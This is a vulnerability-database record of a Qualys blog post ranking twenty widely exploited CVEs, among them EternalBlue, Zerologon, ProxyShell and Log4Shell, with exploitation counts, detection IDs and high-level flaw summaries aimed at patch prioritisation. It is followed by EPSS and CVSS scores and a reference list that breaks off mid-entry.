DATABASE RESOURCES PRICING ABOUT US

{"id": "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "vendorId": null, "type": "qualysblog", "bulletinFamily": "blog", "title": "Qualys Top 20 Most Exploited Vulnerabilities", "description": "The earlier blog posts showcased an overview of the **vulnerability threat landscape** that is either remotely exploited or most targeted by attackers._ _A quick recap \u2013 We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware &amp; ransomware.\n\nThis blog post will focus on **Qualys\u2019 Top Twenty Vulnerabilities, **targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.\n\nSome of these vulnerabilities are part of the recent [**CISA Joint Cybersecurity Advisory (CSA)**](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>)**,** published on August 3, 2023; you can access it from [**2022 Top Routinely Exploited Vulnerabilities**](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a>)**.**\n\nRead on- \n\n## Stats on the Top 20 Vulnerable Vendors &amp; By-Products\n\n**Fig 1. Top Vulnerable Vendor**\n\n**Fig 2. Top Vulnerable Products**\n\n## Top Twenty Most Targeted by Attackers\n\n### **1. CVE-2017-11882: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2021, 2022, 2023 (79 times)**\n\nIt was exploited by 467 Malware, 53 Threat Actors, and 14 Ransomware and was trending in the wild as recently as August 31, 2023. \n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\n**Qualys Vulnerability Detection (QID): 110308**\n\nDisclosed in 2017, CVE-2017-11882 is a **significant memory corruption vulnerability** in Microsoft Office&#x27;s Equation Editor. It could enable an attacker to execute arbitrary code under the current user&#x27;s permissions. \n\nIf the user has administrative rights, the attacker could gain complete control of the system, install programs, alter data, or create new user accounts with full privileges. This vulnerability will be exploited if the user opens a specially crafted file, potentially sent via email or hosted on a compromised website.\n\nIt\u2019s been primarily exploited in various cyber-attacks and espionage campaigns.\n\n### 2\\. **CVE-2017-0199: Microsoft Wordpad Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (59 times)**\n\nIt was exploited by 93 Malware, 53 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 110297**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2017-0199 is a notable remote code execution vulnerability that affects specific Microsoft Office and WordPad versions precisely when they parse specially crafted files. This vulnerability is the most favored vulnerability by malware, threat actors, and ransomware. \n\nIf successfully exploited, an attacker could execute arbitrary code in the current user&#x27;s security context, potentially taking control of the system. Exploitation involves a user opening or previewing a maliciously crafted file, often sent via email. Microsoft has addressed this vulnerability by correcting how Office and WordPad parse these files and by enabling certain API functionality in Windows for further resolution.\n\n### 3\\. **CVE-2012-0158: Vulnerability in Windows Common Controls Could Allow RCE**\n\n**Vulnerability Trending Over Years: 2013, 2020, 2021, 2023 (33 times)**\n\nIt was exploited by 63 Malware, 45 Threat Actors, 2 Ransomware and was trending in the wild as recently as August 31, 2023.\n\n**Qualys Vulnerability Detection (QID): 90793**\n\nCVE-2012-0158 is a substantial remote code execution vulnerability in Windows standard controls. An attacker can exploit the flaw by constructing a specially crafted webpage. Upon viewing this webpage, the vulnerability can allow remote code execution, potentially granting the attacker the same rights as the logged-on user. \n\nIf the user has administrative privileges, this could mean total control of the affected system. Disclosed in 2012, this vulnerability has been notably exploited in various cyber-attacks, enabling attackers to install programs, manipulate data, or create new accounts with full user rights.\n\n### 4\\. **CVE-2017-8570: Microsoft Office Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (25 times)**\n\nIt was exploited by 52 Malware 11 Threat Actors and was trending in the wild as recently as September 2, 2023\n\n**Qualys Vulnerability Detection (QID): 110300**\n\nCVE-2017-8570 is a significant remote code execution vulnerability in Microsoft Office and WordPad. It involves the way these applications handle specially crafted files. It can be exploited by an attacker who convinces a user to open a specially designed file, potentially allowing the attacker to run arbitrary code on the victim&#x27;s machine with the same privileges as the logged-in user and serving as a downloader to other high-profile malware.\n\n### 5\\. **CVE-2020-1472: Zerologon - An Unauthenticated Privilege Escalation to Full Domain Privileges**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2022, 2023 (56 times)**\n\nIt was exploited by 18 Malware, 16 Threat Actors, 11 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):** **91680**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier. **\n\nCVE-2020-1472, or **Zerologon, is a severe vulnerability in Microsoft&#x27;s Netlogon Remote Protocol** due to a flawed implementation of AES-CFB8 encryption.\n\nUsing a fixed initialization vector and accepting unencrypted sessions allows an attacker to impersonate a server and compromise the entire Windows domain. The attacker takes control over all the Active Directory identity services.\n\n### 6\\. **CVE-2017-0144, CVE-2017-0145, CVE-2017-0143: Windows SMBv1 Remote Code Execution Vulnerability WannaCry, Petya**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (50 times)**\n\nIt was exploited by 12 Malware, 10 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 1, 2023.\n\n**Qualys Vulnerability Detection (QID): 91361, 91360, 91359, 91345**\n\nCommonly known as Shadow Broker or MS17-010, or &quot;ETERNALBLUE,&quot; or &quot;ETERNALSYNERGY&quot; or &quot;ETERNAL ROMANCE&quot; is a remote code execution vulnerability in Microsoft&#x27;s Server Message Block 1.0 (SMBv1) protocol.\n\nThe vulnerability arises from how SMBv1 handles specific requests, allowing an attacker(usually authenticated) to send a specially crafted packet to an SMBv1 server, enabling them to execute code on the target server.\n\nIt was infamously exploited in the widespread WannaCry ransomware attack in 2017, leading to global data encryption and ransom demands.\n\n### 7\\. **CVE-2012-1723: Java Applet Field Bytecode Verifier Cache Remote Code Execution**\n\n**Vulnerability Trending Over Years: 2023 (6 times)**\n\nIt was exploited by 91 Malware, 8 Threat Actors, 41 Ransomware and was trending in the wild as recently as August 17, 2023.\n\n**Qualys Vulnerability Detection (QID): 120274**\n\nCVE-2012-1723 is a substantial vulnerability found in the Java Runtime Environment. It can be exploited through a malicious web page, hosting a rogue Java applet can be exploited through a malicious web page hosting rogue Java applet.\n\nThe issue, originating from a type-confusion error in the &quot;HotSpot&quot; component, allows untrusted Java applets or applications to bypass the Java sandbox security restrictions and execute arbitrary code on a user&#x27;s system\n\n### 8\\. **CVE-2021-34473, CVE-2021-34523, CVE-2021-31207: Microsoft Exchange Server RCE (ProxyShell)**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (39 times)**\n\nIt was exploited by 12 Malware, 20 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50114, 50111, 50112**\n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier. **\n\nProxyShell, a chain of vulnerabilities that impacts on-premises Microsoft Exchange Servers, is widely used for email and associated services globally.\n\nThese vulnerabilities exist in the Microsoft Client Access Service (CAS), typically running on port 443 in IIS, often exposed to the internet to allow users to access their email remotely. This exposure has led to widespread exploitation by threat actors deploying web shells to execute arbitrary code on compromised devices. They allow an actor to bypass authentication and execute code as a privileged user.\n\n### 9\\. **CVE-2019-11510: Pulse Secure Pulse Connect Secure SSL VPN Unauthenticated Path**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2023 (53 times)**\n\nIt was exploited by 13 Malware, 18 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 38771**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2019-11510 is a critical vulnerability found in Pulse Connect Secure, a widely used VPN solution by Pulse Secure. The flaw enables an unauthenticated, remote attacker to exploit a specific endpoint and read arbitrary files on the system, including sensitive information such as private keys and user credentials.\n\nDue to its severity, It can provide an attacker with similar access to the corporate network as a legitimate user.\n\n### 10\\. **CVE-2021-44228: Apache Log4j Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (77 times)**\n\nIt was exploited by 10 Malware, 26 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 376157, 730297**\n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2021-44228, or &quot;Log4Shell,&quot; is a severe vulnerability in Apache&#x27;s log4j Java library. The flaw exploits the &#x27;lookups&#x27; feature of log4j, enabling an attacker to use a specially crafted input to trigger the execution of a remote Java class on an LDAP server, leading to Remote Code Execution.\n\nThis issue is highly dangerous if the user input containing specific characters is logged by log4j. It can trigger Java method lookup, resulting in the execution of a user-defined remote Java class on an LDAP server, leading to Remote Code Execution (RCE) on the server running the vulnerable log4j instance.\n\n### 11\\. **CVE-2014-6271: Shellshock \u2013 Linux Bash Vulnerability**\n\n**Vulnerability Trending Over Years: 2014, 2016, 2017, 2020, 2021, 2022, 2023 (70 times)**\n\nIt was exploited by 18 Malware, 1 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 122693, 13038, 150134**\n\nShellshock (CVE-2014-6271) is a critical vulnerability affecting the Unix Bash shell in many Linux, Unix, and Mac OS systems. It allows remote code execution by misusing Bash&#x27;s processing of environment variables, enabling attackers to append and execute malicious commands. It has a high severity score since it can impact multiple devices and applications, risking unauthorized data access or service disruption,\n\n### 12\\. **CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (30 times)**\n\nIt was exploited by 21 Malware, 10 Threat Actors, and 7 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 91447**\n\nCVE-2018-8174 is a critical vulnerability in Microsoft Windows&#x27; VBScript Engine, enabling remote code execution. Triggered by viewing a malicious website with Internet Explorer or opening a rigged Microsoft Office document, this flaw allows an attacker to manipulate memory objects and execute code. \nThe attacker can fully control the system if the user has administrative rights.** \n**\n\n### 13\\. **CVE-2013-0074: Microsoft Silverlight Could Allow Remote Code Execution**\n\n**Vulnerability Trending Over Years**_**: **_**2023 (8 times)**\n\nIt was exploited by 62 Malware 50 Ransomware and was trending in the wild as recently as August 20, 2023.\n\n**Qualys Vulnerability Detection (QID): 90870**\n\nCVE-2013-0074 is a remote code execution vulnerability in Microsoft Silverlight, which permits a crafted Silverlight application to access memory unsafely, thereby leading to the execution of arbitrary code under the current user\u2019s security context.\n\nIf the user has admin rights, the attacker installs programs, alters or deletes data, or generates new accounts with full privileges. The user can be deceived into visiting a malicious website or clicking on a link, commonly through an email or instant message.\n\n### 14\\. **CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Vulnerability**\n\n**Vulnerability Trending Over Years: 2023 (10 times)**\n\nIt was exploited by 66 Malware, 3 Threat Actors, and 42 Ransomware and was trending in the wild as recently as July 26, 2023.\n\n**Qualys Vulnerability Detection (QID): 119956**\n\nCVE-2012-0507 is a critical vulnerability in the Java Runtime Environment (JRE) allowing untrusted Java applets to execute arbitrary code outside the Java sandbox. Originating from a flaw in the AtomicReferenceArray class implementation, **this vulnerability was exploited by Flashback Trojan in 2012**. It was observed to have led to one of the most significant known malware attacks on Apple devices. Attackers can exploit this vulnerability by tricking users into visiting a malicious website hosting a Java applet.\n\n### 15\\. **CVE-2019-19781: Citrix ADC and Citrix Gateway - Remote Code Execution (RCE) Vulnerability**\n\n**Vulnerability Trending Over Years: 2020, 2022, 2023 (60 times)**\n\nIt was exploited by 11 Malware, 12 Threat Actors, and 10 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 372305, 150273**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2019-19781, or &quot;Shitrix,&quot; is a significant vulnerability associated with Citrix Application Delivery Controller (ADC) and Citrix Gateway, allowing unauthenticated attackers to perform arbitrary code execution, granting them access to internal network resources.\n\nThe flaw resides in the VPN component of the affected products, enabling directory traversal and giving attackers both read and write access to the underlying file system.\n\n### 16\\. **CVE-2018-0802: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (19 times)**\n\nExploited by 29 Malware 24 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 110310**\n\nCVE-2018-0802 is a critical vulnerability within Microsoft Office and WordPad, which, if exploited, allows remote code execution via specially crafted files.\n\nAttackers can run arbitrary code in the current user&#x27;s context, potentially taking over the system if the user holds administrative rights. This vulnerability was notably used in targeted attacks and was being actively exploited before Microsoft released a security update in January 2018 that correctly handles objects in memory, resolving the issue.\n\n### 17\\. **CVE-2021-26855: Microsoft Exchange Server Authentication Bypass (RCE)**\n\n**Vulnerability Trending Over Years:** **2021, 2023 (46 times)**\n\nIt was exploited by 19 Malware, 22 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50107, 50108**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2021-26855, a part of the ProxyLogon exploit chain, is a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server that enables attackers to bypass authentication mechanisms and impersonate users.\n\nThe flaw allows arbitrary HTTP requests, granting access to users&#x27; mailboxes and enabling information theft. It has been widely exploited by various threat actors, leading to emergency patches by Microsoft.\n\n### 18\\. **CVE-2019-2725: Oracle WebLogic Affected by Unauthenticated RCE Vulnerability**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2022, 2023 (53 times)** \n\nIt was exploited by 10 Malware, 4 Threat Actors, 9 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 150267, 87386** \n\nCVE-2019-2725 is a severe remote code execution vulnerability in Oracle WebLogic Server that allows unauthenticated attackers to execute arbitrary code over a network without user interaction. It was quickly weaponized to install cryptocurrency miners. \n\n### 19\\. **CVE-2018-13379: Fortinet FortiGate (FortiOS) System File Leak through Secure Sockets Layer (SSL)**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2023 (41 times)** \n\nIt was exploited by 6 Malware, 13 Threat Actors, 6 Ransomware and was trending in the wild as recently as August 30, 2023.\n\n**Qualys Vulnerability Detection (QID): 43702** \n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier. **\n\nCVE-2018-13379 is a path traversal vulnerability found in the Fortinet FortiOS SSL VPN web portal. An unauthenticated attacker can read sensitive system files via specially crafted HTTP requests. The exploit could expose SSL VPN session data, leading to more severe attacks. \n\n### 20\\. CVE-2021-26084: Atlassian Confluence Server Webwork OGNL Injection RCE Vulnerability\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (35 times)**\n\nIt was exploited by 8 Malware, 6 Threat Actors, and 8 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 730172, 150368, 375839**\n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2021-26084 is a critical vulnerability in Atlassian&#x27;s Confluence Server and Data Center, specifically within the Webwork OGNL component. This vulnerability can enable an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance, potentially compromising system integrity.\n\n## TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk and top twenty vulnerabilities.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3.jpg>)Fig 3. Qualys VMDR TruRisk Dashboard for Top 20 Vulnerabilities\n\nThe **Qualys VMDR TruRisk Dashboard** helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score and high-risk vulnerabilities with your organization\u2019s global risk score and high-risk vulnerabilities. Once you identify the vulnerable assets for these top twenty CVEs prioritized among your remediation owners, you can use Qualys Patch management to instantly reduce the risk.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/09/Qualys_VMDR_TruRisk__Dashboard.zip>)\n\n## Key Insights &amp; Takeaways\n\n * In the current Vulnerability Threat Landscape, identifying open vulnerabilities and effective remediation is the highest priority for every defender.\n * Among the vast scale of the CVEs available, you need to know the weaponized high-risk vulnerabilities that are actively targeted by Threat Actors, Malware, and ransomware families.\n * Use multi-dimensional Threat Intelligence to prioritize vulnerabilities rather than implementing multiple siloed threat approaches.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a TruRisk score of 90 or higher, greatly simplifying the prioritization process.\n\n## References\n\n * [Part 1: An In-Depth Look at the Latest Vulnerability Threat Landscape](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>)\n * [Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)](<https://blog.qualys.com/vulnerabilities-threat-research/2023/07/18/part-2-an-in-depth-look-at-the-latest-vulnerability-threat-landscape-attackers-edition>)\n\n## Additional Contributors\n\n * **Shreya Salvi, Data Scientist, Qualys**\n * **Saeed Abbasi, Product Manager, Vulnerability Research**", "published": "2023-09-04T14:00:00", "modified": "2023-09-04T14:00:00", "epss": [{"cve": "CVE-2012-0158", "epss": 0.97286, "percentile": 0.99805, "modified": "2023-10-03"}, {"cve": "CVE-2012-0507", "epss": 0.97394, "percentile": 0.99867, "modified": "2023-08-13"}, {"cve": "CVE-2012-1723", "epss": 0.9716, "percentile": 0.99697, "modified": "2023-08-14"}, {"cve": "CVE-2013-0074", "epss": 0.96657, "percentile": 0.99503, "modified": "2023-10-02"}, {"cve": "CVE-2014-6271", "epss": 0.97566, "percentile": 0.99998, "modified": "2023-09-30"}, {"cve": "CVE-2017-0143", "epss": 0.97334, "percentile": 0.99837, "modified": "2023-10-03"}, {"cve": "CVE-2017-0144", "epss": 0.97452, "percentile": 0.99938, "modified": "2023-10-03"}, {"cve": "CVE-2017-0145", "epss": 0.97347, "percentile": 0.99849, "modified": "2023-10-03"}, {"cve": "CVE-2017-0199", "epss": 0.97445, "percentile": 0.99932, "modified": "2023-10-03"}, {"cve": "CVE-2017-11882", "epss": 0.97464, "percentile": 0.99946, "modified": "2023-09-30"}, {"cve": "CVE-2017-8570", "epss": 0.9743, "percentile": 0.99895, "modified": "2023-06-05"}, {"cve": "CVE-2018-0802", "epss": 0.97245, "percentile": 0.99737, "modified": "2023-06-19"}, {"cve": "CVE-2018-13379", "epss": 0.97491, "percentile": 0.99954, "modified": "2023-06-23"}, {"cve": "CVE-2018-8174", "epss": 0.97418, "percentile": 0.99883, "modified": "2023-06-23"}, {"cve": "CVE-2019-11510", "epss": 0.97334, "percentile": 0.99806, "modified": "2023-06-13"}, {"cve": "CVE-2019-19781", "epss": 0.97475, "percentile": 0.99939, "modified": "2023-06-13"}, {"cve": "CVE-2019-2725", "epss": 0.97556, "percentile": 0.99992, "modified": "2023-06-13"}, {"cve": "CVE-2020-1472", "epss": 0.9732, "percentile": 0.9979, "modified": "2023-06-06"}, {"cve": "CVE-2021-26084", "epss": 0.97488, "percentile": 0.99947, "modified": "2023-05-27"}, {"cve": "CVE-2021-26855", "epss": 0.97534, "percentile": 0.99983, "modified": "2023-05-27"}, {"cve": "CVE-2021-31207", "epss": 0.97191, "percentile": 0.99712, "modified": "2023-08-06"}, {"cve": "CVE-2021-34473", "epss": 0.97322, "percentile": 0.99787, "modified": "2023-05-23"}, {"cve": "CVE-2021-34523", "epss": 0.97467, "percentile": 0.9993, "modified": "2023-05-23"}, {"cve": "CVE-2021-44228", "epss": 0.97565, "percentile": 0.99997, "modified": "2023-05-23"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "reporter": "Ramesh Ramachandran", "references": [], "cvelist": ["CVE-2012-0158", "CVE-2012-0507", "CVE-2012-1723", "CVE-2013-0074", "CVE-2014-6271", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2018-13379", "CVE-2018-8174", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-2725", "CVE-2020-1472", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228"], "immutableFields": [], "lastseen": "2023-10-03T17:01:01", "viewCount": 48, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2020-1472"]}, {"type": "altlinux", "idList": ["FD4483A7DF9B7189B007C0C774CA4588"]}, {"type": "amazon", "idList": ["ALAS-2012-088", "ALAS-2014-418", "ALAS-2014-419", "ALAS-2021-1469", "ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1585", "ALAS2-2021-1649", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "archlinux", "idList": ["ASA-201409-2", "ASA-202009-17"]}, {"type": "arista", "idList": ["ARISTA:006", "ARISTA:0070"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940", "CONFSERVER-68844", "CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:01414FF4-26B2-4222-97E5-C5371A16E182", "AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:0B98F2DD-5956-40B0-B275-66C7E7BB4D2D", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:26BDFAC3-8C29-40D1-B3A7-C26249A3B4D7", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:2D05FC62-63F8-468A-A143-8C876A7F9789", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "AKB:4DF5EF01-8CC5-4A65-87F7-E627FAA3F022", "AKB:5200081C-5C1D-47C7-88A9-89C269E0482E", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:5E706DDA-98EC-49CA-AB21-4814DAF26444", "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:6F1D646E-2CDB-4382-A212-30728A7DB899", "AKB:71F77351-1AE5-4161-8836-D26680828466", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:9977C74D-CDF9-4992-9D78-89CEEEAEA23A", "AKB:9B4E2AEC-697D-42F0-9FED-B010FB1F82ED", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:B42AC919-79F8-43F3-A20E-E7943C97C535", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "AKB:B7C679E9-6ECB-4663-BF1E-330295E69CC4", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:D0ACE522-D43F-4688-92FE-CFF1799B4890", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:D70C6939-9892-4F90-8529-889255B7FDE7", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "AKB:ED494A43-9779-4766-AFD9-B3A3F48CD048", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "AKB:F6BD9E12-AF1F-4DC2-A870-80C5439C4AB9"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:7E0DF6DEBB35FB55F6B4D33A7262A422", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:CA14883EDC0D830220313DB4AE994C8A", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "JAVA_ATOMICREFERENCEARRAY", "MS12_027", "MS17_010", "NETSCALER_TRAVERSAL_RCE", "OFFICE_WSDL"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0", "CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "centos", "idList": ["CESA-2012:0135", "CESA-2012:0729", "CESA-2012:0730", "CESA-2012:1009", "CESA-2014:1293", "CESA-2014:1306", "CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:252743", "VU:421280", "VU:490028", "VU:619785", "VU:921560", "VU:927237", "VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-129", "CPAI-2012-130", "CPAI-2012-131", "CPAI-2012-132", "CPAI-2012-133", "CPAI-2012-139", "CPAI-2012-150", "CPAI-2012-380", "CPAI-2013-1644", "CPAI-2013-3486", "CPAI-2014-1384", "CPAI-2014-1846", "CPAI-2014-2364", "CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0200", "CPAI-2017-0251", "CPAI-2017-0725", "CPAI-2017-1009", "CPAI-2018-0018", "CPAI-2018-0349", "CPAI-2018-1187", "CPAI-2019-0546", "CPAI-2019-1097", "CPAI-2019-1653", 